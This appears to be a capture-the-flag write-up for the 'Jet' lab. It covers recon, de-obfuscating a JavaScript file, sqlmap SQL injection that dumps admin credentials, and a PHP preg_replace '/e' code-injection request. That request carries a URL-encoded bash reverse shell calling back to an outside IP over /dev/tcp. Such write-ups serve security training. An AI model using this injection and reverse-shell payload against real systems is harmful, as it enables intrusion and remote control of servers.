Jet
I'll only cover the web challenges and leave all the reversing and crypto challenges up to the you :)
Initial Enumeration
Rustscan
sudo rustscan -t 1500 -b 1500 --ulimit 65000 -a 10.13.37.10 -- -sV -sC -oA ./{{ip}}Ports
Open 10.13.37.10:22
Open 10.13.37.10:53
Open 10.13.37.10:80
Open 10.13.37.10:5555
Open 10.13.37.10:7777
Open 10.13.37.10:8082
Open 10.13.37.10:8081
Open 10.13.37.10:8083
Open 10.13.37.10:9201Services
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
53/tcp open domain syn-ack ttl 63 ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http syn-ack ttl 63 nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Welcome to nginx on Debian!
| http-methods:
|_ Supported Methods: GET HEAD
5555/tcp open freeciv? syn-ack ttl 63
| fingerprint-strings:
|_ DNSVersionBindReqTCP, GenericLines, GetRequest, adbConnect:
7777/tcp open cbt? syn-ack ttl 63
| fingerprint-strings:
|_ Arucer, DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, GetRequest, HTTPOptions, RPCCheck, RTSPRequest, Socks5, X11Probe:
8081/tcp open http syn-ack ttl 63 PHP cli server 5.5 or later
|_http-title: 404 Not Found
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
8082/tcp open http syn-ack ttl 63 PHP cli server 5.5 or later
|_http-title: 404 Not Found
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
8083/tcp open http syn-ack ttl 63 PHP cli server 5.5 or later
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: 404 Not Found
9201/tcp open http syn-ack ttl 63 BaseHTTPServer 0.3 (Python 2.7.12)
|_http-server-header: BaseHTTP/0.3 Python/2.7.12
| http-methods:
|_ Supported Methods: GET
|_http-title: Site doesn't have a title (application/json).Connect
Checking the Webpage on Port 80 will reveal the first flag!
curl -i http://10.13.37.10/HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Fri, 10 Mar 2023 14:11:16 GMT
Content-Type: text/html
Content-Length: 891
Last-Modified: Fri, 22 Dec 2017 09:18:31 GMT
Connection: keep-alive
ETag: "5a3ccde7-37b"
Accept-Ranges: bytes
<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx on Debian!</title>
<style>
body {
width: 35em;
margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif;
}
</style>
</head>
<body>
<h1>Welcome to nginx on Debian!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working on Debian. Further configuration is required.</p>
<p>For online documentation and support please refer to
<a href="http://nginx.org/">nginx.org</a></p>
<p>
Please use the <tt>reportbug</tt> tool to report bugs in the
nginx package with Debian. However, check <a
href="http://bugs.debian.org/cgi-bin/pkgreport.cgi?ordering=normal;archive=0;src=nginx;repeatmerged=0">existing
bug reports</a> before reporting a new bug.
</p>
<p><em>Thank you for using debian and nginx.</em></p>
<b>JET{CENSORED}</b>
</body>
</html>Digging in...
The next flag will be presented to us on a new webpage we have yet to discover as nothing else can be found on the ports presented to us at the moment.
DNS Enumeration
It's always worth a shot to check if you are able to perform zone transfers or anything related to DNS. In this case using a reverse lookup I was able to get some domain names.
dig -x 10.13.37.10 @10.13.37.10;; AUTHORITY SECTION:
37.13.10.in-addr.arpa. 604800 IN SOA www.securewebinc.jet. securewebinc.jet. 3 604800 86400 2419200 604800Flag
curl -i http://www.securewebinc.jetHTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Fri, 10 Mar 2023 14:23:19 GMT
Content-Type: text/html
Content-Length: 8855
Last-Modified: Tue, 14 Nov 2017 14:07:30 GMT
Connection: keep-alive
ETag: "5a0af8a2-2297"
Accept-Ranges: bytes
...
<section id="contact">
<div class="container">
<div class="row">
<div class="col-lg-8 mx-auto text-center">
<h2 class="section-heading">Let's Get In Touch!</h2>
<hr class="my-4">
<p class="mb-5">Ready to start your next project with us? That's great! Give us a call and we will get back to you as soon as possible!</p>
</div>
</div>
<div class="row">
<div class="col-lg-4 ml-auto text-center">
<i class="fa fa-phone fa-3x mb-3 sr-contact"></i>
<p>123-456-6789</p>
</div>
<div class="col-lg-4 mr-auto text-center">
<i class="fa fa-flag-checkered fa-3x mb-3 sr-contact"></i>
<p>JET{CENSORED}</p>
</div>
</div>
</div>
</section>
...Going Deeper
Nice flag to be honest. We have to dig deeper on the page we just discovered to find a new application!
Enumeration
I used feroxbuster to enumerate directories and files on the page
feroxbuster -u http://www.securewebinc.jet/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -k -B -x "txt,html,php,zip,rar,tar.gz" -v -e -o ./ferox.txtOne result stood out to me as it seemed to be odd
http://www.securewebinc.jet/js/secure.jsI visited the page and can see that it's some "encrypted" code
eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,103,101,116,83,116,97,116,115,40,41,10,123,10,32,32,32,32,36,46,97,106,97,120,40,123,117,114,108,58,32,34,47,100,105,114,98,95,115,97,102,101,95,100,105,114,95,114,102,57,69,109,99,69,73,120,47,97,100,109,105,110,47,115,116,97,116,115,46,112,104,112,34,44,10,10,32,32,32,32,32,32,32,32,115,117,99,99,101,115,115,58,32,102,117,110,99,116,105,111,110,40,114,101,115,117,108,116,41,123,10,32,32,32,32,32,32,32,32,36,40,39,35,97,116,116,97,99,107,115,39,41,46,104,116,109,108,40,114,101,115,117,108,116,41,10,32,32,32,32,125,44,10,32,32,32,32,101,114,114,111,114,58,32,102,117,110,99,116,105,111,110,40,114,101,115,117,108,116,41,123,10,32,32,32,32,32,32,32,32,32,99,111,110,115,111,108,101,46,108,111,103,40,114,101,115,117,108,116,41,59,10,32,32,32,32,125,125,41,59,10,125,10,103,101,116,83,116,97,116,115,40,41,59,10,115,101,116,73,110,116,101,114,118,97,108,40,102,117,110,99,116,105,111,110,40,41,123,32,103,101,116,83,116,97,116,115,40,41,59,32,125,44,32,49,48,48,48,48,41,59));After decryption it looks like this
> "function getStats() { $.ajax({url: "/dirb_safe_dir_rf9EmcEIx/admin/stats.php", success: function(result){ $('#attacks').html(result) }, error: function(result){ console.log(result); }}); } getStats(); setInterval(function(){ getStats(); }, 10000);"Flag
The flag can be found when checking the login page of the newly discovered monitoring application
curl -i http://www.securewebinc.jet/dirb_safe_dir_rf9EmcEIx/admin/login.phpHTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Fri, 10 Mar 2023 14:36:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=o8bm091ru1hgir2lth0dhgaj33; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
...
<!-- JET{CENSORED} -->
<form action="/dirb_safe_dir_rf9EmcEIx/admin/dologin.php" method="post">
<div class="form-group has-feedback">
<input name="username" type="username" class="form-control" placeholder="Username">
<span class="glyphicon glyphicon-envelope form-control-feedback"></span>
</div>
<div class="form-group has-feedback">
<input name="password" type="password" class="form-control" placeholder="Password">
<span class="glyphicon glyphicon-lock form-control-feedback"></span>
</div>
<div class="row">
<div class="col-xs-8">
<div class="checkbox icheck">
<label>
<input type="checkbox"> Remember Me
</label>
</div>
</div>
<!-- /.col -->
<div class="col-xs-4">
<button type="submit" class="btn btn-primary btn-block btn-flat">Sign In</button>
</div>
<!-- /.col -->
</div>
</form>
...Bypassing Authentication
After discovering the login page I tried the usual enumeration and finally discovered that the username parameter was vulnerable to SQL Injection
Enumeration
First I tried to login as "admin:admin" which resulted in a message like
Wrong password for user adminSecond I tried "test:test" which gave me following response
Unknown userNow I used ' or 1 or ' without a password and got this response
Wrong password for user adminExploitation
I'm lazy when it comes down to SQL Injections so I used sqlmap for this task with a request I captured in burp
sqlmap -r req.req -D jetadmin -T users --dump --batch[15:59:20] [INFO] fetching columns for table 'users' in database 'jetadmin'
[15:59:20] [INFO] resumed: 'id'
[15:59:20] [INFO] resumed: 'int(11)'
[15:59:20] [INFO] resumed: 'username'
[15:59:20] [INFO] resumed: 'varchar(50)'
[15:59:20] [INFO] resumed: 'password'
[15:59:20] [INFO] resumed: 'varchar(191)'
[15:59:20] [INFO] fetching entries for table 'users' in database 'jetadmin'
[15:59:20] [INFO] retrieved: '1'
[15:59:20] [INFO] retrieved: 'CENSORED'
[15:59:20] [INFO] retrieved: 'admin'
[15:59:20] [INFO] recognized possible password hashes in column 'password'Once the MD5 hash was discovered I was able crack it using crackstation.net
Flag
The flag can be found directly after logging in in the chat section
Command
You will love this one
Enumeration
There's not a lot to discover on the dashboard itself. Only thing that seems to work is the "Quick Email" widget
After going through the whole process of sending an E-Mail I checked burp to see what's happening
POST /dirb_safe_dir_rf9EmcEIx/admin/email.php HTTP/1.1
Host: www.securewebinc.jet
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 327
Origin: http://www.securewebinc.jet
Connection: close
Referer: http://www.securewebinc.jet/dirb_safe_dir_rf9EmcEIx/admin/dashboard.php
Cookie: PHPSESSID=4gufjvu2ksv504vi9gocptl5d6
Upgrade-Insecure-Requests: 1
token: ddac62a28254561001277727cb397baf
swearwords%5B%2Ffuck%2Fi%5D=make+love&swearwords%5B%2Fshit%2Fi%5D=poop&swearwords%5B%2Fass%2Fi%5D=behind&swearwords%5B%2Fdick%2Fi%5D=penis&swearwords%5B%2Fwhore%2Fi%5D=escort&swearwords%5B%2Fasshole%2Fi%5D=bad+person&to=test%40local.com&subject=Test&message=%3Cp%3Edick%3C%2Fp%3E%3Cp%3Ebitch%3Cbr%3E%3C%2Fp%3E&_wysihtml5_mode=1The page also states that a "word filtering" is active to filter out bad words. When we decode the parameters it's clear that some form of php regex is used to replace those words
# Dick will get replaced by penis
# And we have control over the modifier!
swearwords[/dick/i]=penisExploitation
My final "exploit" looked like this and resulted in a reverse shell As stated before I have control over the modifier so I can switch from "i" to "e" which means that my supplied input will be interpreted as code
POST /dirb_safe_dir_rf9EmcEIx/admin/email.php HTTP/1.1
Host: www.securewebinc.jet
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 512
Origin: http://www.securewebinc.jet
Connection: close
Referer: http://www.securewebinc.jet/dirb_safe_dir_rf9EmcEIx/admin/dashboard.php
Cookie: PHPSESSID=4gufjvu2ksv504vi9gocptl5d6
Upgrade-Insecure-Requests: 1
token: ddac62a28254561001277727cb397baf
swearwords%5B%2Ffuck%2Fi%5D=make+love&swearwords%5B%2Fshit%2Fi%5D=poop&swearwords%5B%2Fass%2Fi%5D=behind&swearwords%5B%2Fdick%2Fe%5D=%73%79%73%74%65%6d%28%18%27%62%61%73%68%20%2d%63%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%31%30%2e%31%34%2e%31%32%2f%35%33%20%30%3e%26%31%22%27%19%29%3b&swearwords%5B%2Fwhore%2Fi%5D=escort&swearwords%5B%2Fasshole%2Fi%5D=bad+person&to=test%40local.com&subject=Test&message=%3Cp%3Edick%3C%2Fp%3E%3Cp%3Ebitch%3Cbr%3E%3C%2Fp%3E&_wysihtml5_mode=1Flag
After getting a shell as www-data the flag can be found in the directory of the dashboard in a file called a_flag_is_here.txt
Last updated